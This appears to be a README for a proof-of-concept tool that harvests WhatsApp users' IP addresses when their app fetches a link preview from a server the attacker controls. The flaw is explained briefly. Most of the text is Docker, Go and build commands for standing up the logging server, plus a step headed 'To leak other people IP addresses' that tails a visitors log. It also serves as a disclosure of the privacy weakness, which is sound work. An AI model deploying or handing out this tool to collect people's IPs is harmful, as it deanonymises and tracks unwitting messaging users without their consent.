🎠WhatsApp user’s IP disclosure with link preview
As you know modern messengers have many features besides their main function — texting. They are able to play/record music/videos, send photos/geolocation and so on.
So they are also capable to generate link previews. The best practice is to generate preview by external proxy server which will fetch content for you.
However WhatsApp developers decided to rely on internal web engine that comes with OS.
It's not needed to explain that now WhatsApp will leak your IP address on every received link, and in addition user will leak his IP in link preview mode without actually opening the link.
NOTE: You will need VPS with static IP and domain.
sudo docker pull unstab1e/whatsipp
sudo docker run --rm -it -p 80:8080 unstab1e/whatsipp
go get
/git clone
:$ go get https://github.com/moldabekov/whatsipp
or
$ git clone https://github.com/moldabekov/whatsipp
Build binary:
$ make build
Run it:
$ sudo W_LEAK_PORT=80 ./main
$ make docker
To test PoC on yourself:
To leak other people IP addresses:
$ tail -f visitors.log
Greets goes to Rahul Kankrale for figuring things out.
(C) MIT License